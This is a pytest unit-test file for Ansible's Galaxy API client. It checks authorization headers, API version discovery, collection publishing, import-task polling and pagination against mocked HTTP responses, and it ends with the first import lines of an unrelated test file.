    """Username+password become a base64 Basic Authorization header."""
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/",
                    token=BasicAuthToken(username=u"user", password=u"pass"))
    headers = {}
    api._add_auth_token(headers, "", required=True)
    assert headers == {'Authorization': 'Basic dXNlcjpwYXNz'}
def test_api_basic_auth_no_password():
    """A username without a password still yields a valid Basic header."""
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/",
                    token=BasicAuthToken(username=u"user"))
    headers = {}
    api._add_auth_token(headers, "", required=True)
    assert headers == {'Authorization': 'Basic dXNlcjo='}
def test_api_dont_override_auth_header():
    """A pre-existing Authorization header is never clobbered."""
    headers = {'Authorization': 'Custom token'}
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
    api._add_auth_token(headers, "", required=True)
    assert headers == {'Authorization': 'Custom token'}
def test_initialise_galaxy(monkeypatch):
    """authenticate() discovers API versions then POSTs the github token."""
    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(u'{"available_versions":{"v1":"v1/"}}'),
        StringIO(u'{"token":"my token"}'),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
    actual = api.authenticate("github_token")

    # v2 is reported even though the server only advertised v1 — presumably
    # added implicitly by the client; confirm against GalaxyAPI internals.
    assert len(api.available_api_versions) == 2
    assert api.available_api_versions['v1'] == u'v1/'
    assert api.available_api_versions['v2'] == u'v2/'
    assert actual == {u'token': u'my token'}
    assert mock_open.call_count == 2
    # Call 0: root API discovery; call 1: token exchange with the github token.
    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
    assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
    assert mock_open.mock_calls[1][1][0] == 'https://galaxy.ansible.com/api/v1/tokens/'
    assert 'ansible-galaxy' in mock_open.mock_calls[1][2]['http_agent']
    assert mock_open.mock_calls[1][2]['data'] == 'github_token=github_token'
def test_initialise_galaxy_with_auth(monkeypatch):
    """Same as test_initialise_galaxy but with a pre-configured GalaxyToken."""
    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(u'{"available_versions":{"v1":"v1/"}}'),
        StringIO(u'{"token":"my token"}'),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=GalaxyToken(token='my_token'))
    actual = api.authenticate("github_token")

    assert len(api.available_api_versions) == 2
    assert api.available_api_versions['v1'] == u'v1/'
    assert api.available_api_versions['v2'] == u'v2/'
    assert actual == {u'token': u'my token'}
    assert mock_open.call_count == 2
    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
    assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
    assert mock_open.mock_calls[1][1][0] == 'https://galaxy.ansible.com/api/v1/tokens/'
    assert 'ansible-galaxy' in mock_open.mock_calls[1][2]['http_agent']
    assert mock_open.mock_calls[1][2]['data'] == 'github_token=github_token'
def test_initialise_automation_hub(monkeypatch):
    """Automation Hub (v2+v3) discovery sends a Bearer Authorization header."""
    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(u'{"available_versions":{"v2": "v2/", "v3":"v3/"}}'),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
    token = KeycloakToken(auth_url='https://api.test/')
    mock_token_get = MagicMock()
    mock_token_get.return_value = 'my_token'
    monkeypatch.setattr(token, 'get', mock_token_get)

    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)

    assert len(api.available_api_versions) == 2
    assert api.available_api_versions['v2'] == u'v2/'
    assert api.available_api_versions['v3'] == u'v3/'

    # The discovery request itself must already carry the Bearer token.
    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
    assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
    assert mock_open.mock_calls[0][2]['headers'] == {'Authorization': 'Bearer my_token'}
def test_initialise_unknown(monkeypatch):
    """When both discovery endpoints return HTTP 500, a clear error is raised."""
    mock_open = MagicMock()
    # Both the bare URL and the '/api/'-suffixed fallback fail.
    mock_open.side_effect = [
        urllib_error.HTTPError('https://galaxy.ansible.com/api/', 500, 'msg', {}, StringIO(u'{"msg":"raw error"}')),
        urllib_error.HTTPError('https://galaxy.ansible.com/api/api/', 500, 'msg', {}, StringIO(u'{"msg":"raw error"}')),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=GalaxyToken(token='my_token'))

    expected = "Error when finding available api versions from test (%s) (HTTP Code: 500, Message: msg)" \
        % api.api_server
    with pytest.raises(AnsibleError, match=re.escape(expected)):
        api.authenticate("github_token")
def test_get_available_api_versions(monkeypatch):
    """available_api_versions lazily fetches and caches the version map."""
    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(u'{"available_versions":{"v1":"v1/","v2":"v2/"}}'),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
    actual = api.available_api_versions
    assert len(actual) == 2
    assert actual['v1'] == u'v1/'
    assert actual['v2'] == u'v2/'

    # Exactly one network round-trip for the discovery document.
    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
    assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
def test_publish_collection_missing_file():
    """Publishing a nonexistent path raises a descriptive AnsibleError."""
    fake_path = u'/fake/ÅÑŚÌβŁÈ/path'
    api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v2")
    expected = to_native("The collection path specified '%s' does not exist." % fake_path)
    with pytest.raises(AnsibleError, match=expected):
        api.publish_collection(fake_path)
def test_publish_collection_not_a_tarball():
    """Publishing a file that is not a tarball raises AnsibleError."""
    expected = "The collection path specified '{0}' is not a tarball, use 'ansible-galaxy collection build' to " \
               "create a proper release artifact."
    api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v2")

    with tempfile.NamedTemporaryFile(prefix=u'ÅÑŚÌβŁÈ') as temp_file:
        # A single NUL byte: a regular file, but definitely not a tar archive.
        temp_file.write(b"\x00")
        temp_file.flush()
        with pytest.raises(AnsibleError, match=expected.format(to_native(temp_file.name))):
            api.publish_collection(temp_file.name)
def test_publish_collection_unsupported_version():
    """Publishing against a v1-only server raises an unsupported-version error."""
    api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v1")
    expected = "Galaxy action publish_collection requires API versions 'v2, v3' but only 'v1' are available on test " \
               "https://galaxy.ansible.com/api/"
    with pytest.raises(AnsibleError, match=expected):
        api.publish_collection("path")
@pytest.mark.parametrize('api_version, collection_url', [
    ('v2', 'collections'),
    ('v3', 'artifacts/collections'),
])
def test_publish_collection(api_version, collection_url, collection_artifact, monkeypatch):
    """publish_collection POSTs a multipart body to the version-specific URL."""
    api = get_test_galaxy_api("https://galaxy.ansible.com/api/", api_version)

    mock_call = MagicMock()
    mock_call.return_value = {'task': 'http://task.url/'}
    monkeypatch.setattr(api, '_call_galaxy', mock_call)

    actual = api.publish_collection(collection_artifact)
    assert actual == 'http://task.url/'
    assert mock_call.call_count == 1
    assert mock_call.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/%s/%s/' % (api_version, collection_url)
    # Content-length must match the multipart payload; the payload starts with
    # the multipart boundary marker.
    assert mock_call.mock_calls[0][2]['headers']['Content-length'] == len(mock_call.mock_calls[0][2]['args'])
    assert mock_call.mock_calls[0][2]['headers']['Content-type'].startswith(
        'multipart/form-data; boundary=')
    assert mock_call.mock_calls[0][2]['args'].startswith(b'--')
    assert mock_call.mock_calls[0][2]['method'] == 'POST'
    assert mock_call.mock_calls[0][2]['auth_required'] is True
@pytest.mark.parametrize('api_version, collection_url, response, expected', [
    ('v2', 'collections', {},
     'Error when publishing collection to test (%s) (HTTP Code: 500, Message: msg Code: Unknown)'),
    ('v2', 'collections', {
        'message': u'Galaxy error messäge',
        'code': 'GWE002',
    }, u'Error when publishing collection to test (%s) (HTTP Code: 500, Message: Galaxy error messäge Code: GWE002)'),
    ('v3', 'artifact/collections', {},
     'Error when publishing collection to test (%s) (HTTP Code: 500, Message: msg Code: Unknown)'),
    ('v3', 'artifact/collections', {
        'errors': [
            {
                'code': 'conflict.collection_exists',
                'detail': 'Collection "mynamespace-mycollection-4.1.1" already exists.',
                'title': 'Conflict.',
                'status': '400',
            },
            {
                'code': 'quantum_improbability',
                'title': u'Rändom(?) quantum improbability.',
                'source': {'parameter': 'the_arrow_of_time'},
                'meta': {'remediation': 'Try again before'},
            },
        ],
    }, u'Error when publishing collection to test (%s) (HTTP Code: 500, Message: Collection '
       u'"mynamespace-mycollection-4.1.1" already exists. Code: conflict.collection_exists), (HTTP Code: 500, '
       u'Message: Rändom(?) quantum improbability. Code: quantum_improbability)')
])
def test_publish_failure(api_version, collection_url, response, expected, collection_artifact, monkeypatch):
    """Server error payloads (v2 single-error and v3 multi-error formats)
    are translated into readable GalaxyError messages."""
    api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version)

    expected_url = '%s/api/%s/%s' % (api.api_server, api_version, collection_url)

    mock_open = MagicMock()
    mock_open.side_effect = urllib_error.HTTPError(expected_url, 500, 'msg', {},
                                                   StringIO(to_text(json.dumps(response))))
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    with pytest.raises(GalaxyError, match=re.escape(to_native(expected % api.api_server))):
        api.publish_collection(collection_artifact)
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
    ('https://galaxy.server.com/api', 'v2', 'Token', GalaxyToken('my token'),
     '1234',
     'https://galaxy.server.com/api/v2/collection-imports/1234/'),
    ('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
     '1234',
     'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
    """A task that is already successful requires exactly one polling request."""
    api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.return_value = StringIO(u'{"state":"success","finished_at":"time"}')
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    mock_display = MagicMock()
    monkeypatch.setattr(Display, 'display', mock_display)

    api.wait_import_task(import_uri)

    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == full_import_uri
    assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type

    assert mock_display.call_count == 1
    assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
    ('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my token'),
     '1234',
     'https://galaxy.server.com/api/v2/collection-imports/1234/'),
    ('https://galaxy.server.com/api/automation-hub', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
     '1234',
     'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_multiple_requests(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
    """wait_import_task polls again (after a sleep) while the task is unfinished."""
    api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    # First poll: still running; second poll: finished.
    mock_open.side_effect = [
        StringIO(u'{"state":"test"}'),
        StringIO(u'{"state":"success","finished_at":"time"}'),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    mock_display = MagicMock()
    monkeypatch.setattr(Display, 'display', mock_display)

    mock_vvv = MagicMock()
    monkeypatch.setattr(Display, 'vvv', mock_vvv)

    # Stub out the back-off sleep so the test runs instantly.
    monkeypatch.setattr(time, 'sleep', MagicMock())

    api.wait_import_task(import_uri)

    assert mock_open.call_count == 2
    assert mock_open.mock_calls[0][1][0] == full_import_uri
    assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
    assert mock_open.mock_calls[1][1][0] == full_import_uri
    assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type

    assert mock_display.call_count == 1
    assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri

    assert mock_vvv.call_count == 1
    assert mock_vvv.mock_calls[0][1][0] == \
        'Galaxy import process has a status of test, wait 2 seconds before trying again'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri,', [
    ('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my token'),
     '1234',
     'https://galaxy.server.com/api/v2/collection-imports/1234/'),
    ('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
     '1234',
     'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_with_failure(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
    """A failed import raises AnsibleError and routes each server message to
    the matching Display channel (info -> vvv, warning -> warning,
    error -> error)."""
    api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(to_text(json.dumps({
            'finished_at': 'some_time',
            'state': 'failed',
            'error': {
                'code': 'GW001',
                'description': u'Becäuse I said so!',
            },
            'messages': [
                {
                    'level': 'error',
                    'message': u'Somé error',
                },
                {
                    'level': 'warning',
                    'message': u'Some wärning',
                },
                {
                    'level': 'info',
                    'message': u'Somé info',
                },
            ],
        }))),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    mock_display = MagicMock()
    monkeypatch.setattr(Display, 'display', mock_display)

    mock_vvv = MagicMock()
    monkeypatch.setattr(Display, 'vvv', mock_vvv)

    mock_warn = MagicMock()
    monkeypatch.setattr(Display, 'warning', mock_warn)

    mock_err = MagicMock()
    monkeypatch.setattr(Display, 'error', mock_err)

    expected = to_native(u'Galaxy import process failed: Becäuse I said so! (Code: GW001)')
    with pytest.raises(AnsibleError, match=re.escape(expected)):
        api.wait_import_task(import_uri)

    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == full_import_uri
    assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type

    assert mock_display.call_count == 1
    assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri

    assert mock_vvv.call_count == 1
    assert mock_vvv.mock_calls[0][1][0] == u'Galaxy import message: info - Somé info'

    assert mock_warn.call_count == 1
    assert mock_warn.mock_calls[0][1][0] == u'Galaxy import warning message: Some wärning'

    assert mock_err.call_count == 1
    assert mock_err.mock_calls[0][1][0] == u'Galaxy import error message: Somé error'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
    ('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my_token'),
     '1234',
     'https://galaxy.server.com/api/v2/collection-imports/1234/'),
    ('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
     '1234',
     'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_with_failure_no_error(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
    # Same as test_wait_import_task_with_failure, but the server returns an
    # empty error dict: the raised AnsibleError must fall back to the generic
    # "Unknown error … (Code: UNKNOWN)" message pointing at the import URI.
    api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(to_text(json.dumps({
            'finished_at': 'some_time',
            'state': 'failed',
            'error': {},
            'messages': [
                {
                    'level': 'error',
                    'message': u'Somé error',
                },
                {
                    'level': 'warning',
                    'message': u'Some wärning',
                },
                {
                    'level': 'info',
                    'message': u'Somé info',
                },
            ],
        }))),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    mock_display = MagicMock()
    monkeypatch.setattr(Display, 'display', mock_display)
    mock_vvv = MagicMock()
    monkeypatch.setattr(Display, 'vvv', mock_vvv)
    mock_warn = MagicMock()
    monkeypatch.setattr(Display, 'warning', mock_warn)
    mock_err = MagicMock()
    monkeypatch.setattr(Display, 'error', mock_err)

    # The parentheses are escaped by hand here because the string is used
    # directly as a regex pattern by pytest.raises(match=...).
    expected = 'Galaxy import process failed: Unknown error, see %s for more details \\(Code: UNKNOWN\\)' % full_import_uri
    with pytest.raises(AnsibleError, match=expected):
        api.wait_import_task(import_uri)

    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == full_import_uri
    assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type

    assert mock_display.call_count == 1
    assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri

    assert mock_vvv.call_count == 1
    assert mock_vvv.mock_calls[0][1][0] == u'Galaxy import message: info - Somé info'

    assert mock_warn.call_count == 1
    assert mock_warn.mock_calls[0][1][0] == u'Galaxy import warning message: Some wärning'

    assert mock_err.call_count == 1
    assert mock_err.mock_calls[0][1][0] == u'Galaxy import error message: Somé error'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
    ('https://galaxy.server.com/api', 'v2', 'Token', GalaxyToken('my token'),
     '1234',
     'https://galaxy.server.com/api/v2/collection-imports/1234/'),
    ('https://galaxy.server.com/api/automation-hub', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
     '1234',
     'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_timeout(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
    # The server never leaves the "waiting" state, so wait_import_task must
    # give up after the supplied timeout (1 second here) and raise.
    api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    # A side_effect callable (rather than a list) returns a fresh response for
    # every poll, however many polls the back-off loop performs.
    def return_response(*args, **kwargs):
        return StringIO(u'{"state":"waiting"}')

    mock_open = MagicMock()
    mock_open.side_effect = return_response
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    mock_display = MagicMock()
    monkeypatch.setattr(Display, 'display', mock_display)
    mock_vvv = MagicMock()
    monkeypatch.setattr(Display, 'vvv', mock_vvv)
    # Stub out time.sleep so the back-off between polls does not slow the test.
    monkeypatch.setattr(time, 'sleep', MagicMock())

    expected = "Timeout while waiting for the Galaxy import process to finish, check progress at '%s'" % full_import_uri
    with pytest.raises(AnsibleError, match=expected):
        api.wait_import_task(import_uri, 1)

    assert mock_open.call_count > 1
    assert mock_open.mock_calls[0][1][0] == full_import_uri
    assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
    assert mock_open.mock_calls[1][1][0] == full_import_uri
    assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type

    assert mock_display.call_count == 1
    assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri

    # expected_wait_msg = 'Galaxy import process has a status of waiting, wait {0} seconds before trying again'
    assert mock_vvv.call_count > 9  # 1st is opening Galaxy token file.

    # FIXME:
    # assert mock_vvv.mock_calls[1][1][0] == expected_wait_msg.format(2)
    # assert mock_vvv.mock_calls[2][1][0] == expected_wait_msg.format(3)
    # assert mock_vvv.mock_calls[3][1][0] == expected_wait_msg.format(4)
    # assert mock_vvv.mock_calls[4][1][0] == expected_wait_msg.format(6)
    # assert mock_vvv.mock_calls[5][1][0] == expected_wait_msg.format(10)
    # assert mock_vvv.mock_calls[6][1][0] == expected_wait_msg.format(15)
    # assert mock_vvv.mock_calls[7][1][0] == expected_wait_msg.format(22)
    # assert mock_vvv.mock_calls[8][1][0] == expected_wait_msg.format(30)
@pytest.mark.parametrize('api_version, token_type, version, token_ins', [
    ('v2', None, 'v2.1.13', None),
    ('v3', 'Bearer', 'v1.0.0', KeycloakToken(auth_url='https://api.test/api/automation-hub/')),
])
def test_get_collection_version_metadata_no_version(api_version, token_type, version, token_ins, monkeypatch):
    # A single version-detail response must be parsed into a
    # CollectionVersionMetadata object with all fields mapped through.
    api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(to_text(json.dumps({
            'download_url': 'https://downloadme.com',
            'artifact': {
                'sha256': 'ac47b6fac117d7c171812750dacda655b04533cf56b31080b82d1c0db3c9d80f',
            },
            'namespace': {
                'name': 'namespace',
            },
            'collection': {
                'name': 'collection',
            },
            'version': version,
            'metadata': {
                'dependencies': {},
            }
        }))),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    actual = api.get_collection_version_metadata('namespace', 'collection', version)

    assert isinstance(actual, CollectionVersionMetadata)
    assert actual.namespace == u'namespace'
    assert actual.name == u'collection'
    assert actual.download_url == u'https://downloadme.com'
    assert actual.artifact_sha256 == u'ac47b6fac117d7c171812750dacda655b04533cf56b31080b82d1c0db3c9d80f'
    assert actual.version == version
    assert actual.dependencies == {}

    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == '%s%s/collections/namespace/collection/versions/%s/' \
        % (api.api_server, api_version, version)

    # v2 calls dont need auth, so no authz header or token_type
    if token_type:
        assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('api_version, token_type, token_ins, response', [
    ('v2', None, None, {
        'count': 2,
        'next': None,
        'previous': None,
        'results': [
            {
                'version': '1.0.0',
                'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
            },
            {
                'version': '1.0.1',
                'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
            },
        ],
    }),
    # TODO: Verify this once Automation Hub is actually out
    # (v3 responses use a 'data' key instead of v2's 'results').
    ('v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'), {
        'count': 2,
        'next': None,
        'previous': None,
        'data': [
            {
                'version': '1.0.0',
                'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
            },
            {
                'version': '1.0.1',
                'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
            },
        ],
    }),
])
def test_get_collection_versions(api_version, token_type, token_ins, response, monkeypatch):
    # Single-page version listing: both v2 and v3 payload shapes must yield
    # the same flat list of version strings.
    api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.side_effect = [
        StringIO(to_text(json.dumps(response))),
    ]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    actual = api.get_collection_versions('namespace', 'collection')
    assert actual == [u'1.0.0', u'1.0.1']

    assert mock_open.call_count == 1
    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
                                            'versions/' % api_version
    if token_ins:
        assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('api_version, token_type, token_ins, responses', [
    # v2 pagination: top-level 'next'/'previous' URLs and a 'results' list.
    ('v2', None, None, [
        {
            'count': 6,
            'next': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=2',
            'previous': None,
            'results': [
                {
                    'version': '1.0.0',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
                },
                {
                    'version': '1.0.1',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
                },
            ],
        },
        {
            'count': 6,
            'next': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=3',
            'previous': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions',
            'results': [
                {
                    'version': '1.0.2',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.2',
                },
                {
                    'version': '1.0.3',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.3',
                },
            ],
        },
        {
            'count': 6,
            'next': None,
            'previous': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=2',
            'results': [
                {
                    'version': '1.0.4',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.4',
                },
                {
                    'version': '1.0.5',
                    'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.5',
                },
            ],
        },
    ]),
    # v3 pagination: relative URLs nested under 'links' and a 'data' list.
    ('v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'), [
        {
            'count': 6,
            'links': {
                'next': '/api/v3/collections/namespace/collection/versions/?page=2',
                'previous': None,
            },
            'data': [
                {
                    'version': '1.0.0',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.0',
                },
                {
                    'version': '1.0.1',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.1',
                },
            ],
        },
        {
            'count': 6,
            'links': {
                'next': '/api/v3/collections/namespace/collection/versions/?page=3',
                'previous': '/api/v3/collections/namespace/collection/versions',
            },
            'data': [
                {
                    'version': '1.0.2',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.2',
                },
                {
                    'version': '1.0.3',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.3',
                },
            ],
        },
        {
            'count': 6,
            'links': {
                'next': None,
                'previous': '/api/v3/collections/namespace/collection/versions/?page=2',
            },
            'data': [
                {
                    'version': '1.0.4',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.4',
                },
                {
                    'version': '1.0.5',
                    'href': '/api/v3/collections/namespace/collection/versions/1.0.5',
                },
            ],
        },
    ]),
])
def test_get_collection_versions_pagination(api_version, token_type, token_ins, responses, monkeypatch):
    # Three pages must be followed via their 'next' links and merged into a
    # single ordered list of versions; every request must carry auth when a
    # token is configured.
    api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)

    if token_ins:
        mock_token_get = MagicMock()
        mock_token_get.return_value = 'my token'
        monkeypatch.setattr(token_ins, 'get', mock_token_get)

    mock_open = MagicMock()
    mock_open.side_effect = [StringIO(to_text(json.dumps(r))) for r in responses]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    actual = api.get_collection_versions('namespace', 'collection')
    assert actual == [u'1.0.0', u'1.0.1', u'1.0.2', u'1.0.3', u'1.0.4', u'1.0.5']

    assert mock_open.call_count == 3

    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
                                            'versions/' % api_version
    assert mock_open.mock_calls[1][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
                                            'versions/?page=2' % api_version
    assert mock_open.mock_calls[2][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
                                            'versions/?page=3' % api_version

    if token_type:
        assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
        assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type
        assert mock_open.mock_calls[2][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('responses', [
    # Single page: no next link, both results present at once.
    [
        {
            'count': 2,
            'results': [{'name': '3.5.1', }, {'name': '3.5.2'}],
            'next_link': None,
            'next': None,
            'previous_link': None,
            'previous': None
        },
    ],
    # Two pages: the second request must follow next_link.
    [
        {
            'count': 2,
            'results': [{'name': '3.5.1'}],
            'next_link': '/api/v1/roles/432/versions/?page=2&page_size=50',
            'next': '/roles/432/versions/?page=2&page_size=50',
            'previous_link': None,
            'previous': None
        },
        {
            'count': 2,
            'results': [{'name': '3.5.2'}],
            'next_link': None,
            'next': None,
            'previous_link': '/api/v1/roles/432/versions/?&page_size=50',
            'previous': '/roles/432/versions/?page_size=50',
        },
    ]
])
def test_get_role_versions_pagination(monkeypatch, responses):
    # v1 role-related listing: results from all pages are concatenated and one
    # request is issued per page.
    api = get_test_galaxy_api('https://galaxy.com/api/', 'v1')

    mock_open = MagicMock()
    mock_open.side_effect = [StringIO(to_text(json.dumps(r))) for r in responses]
    monkeypatch.setattr(galaxy_api, 'open_url', mock_open)

    actual = api.fetch_role_related('versions', 432)
    assert actual == [{'name': '3.5.1'}, {'name': '3.5.2'}]

    assert mock_open.call_count == len(responses)

    assert mock_open.mock_calls[0][1][0] == 'https://galaxy.com/api/v1/roles/432/versions/?page_size=50'
    if len(responses) == 2:
        assert mock_open.mock_calls[1][1][0] == 'https://galaxy.com/api/v1/roles/432/versions/?page=2&page_size=50'
| gpl-3.0 |
squirrelo/american-gut-web | amgut/lib/test/test_util.py | 1 | 3684 | from unittest import TestCase, main
from amgut.lib.util import (survey_fermented, survey_surf, survey_vioscreen,
survey_asd, rollback)
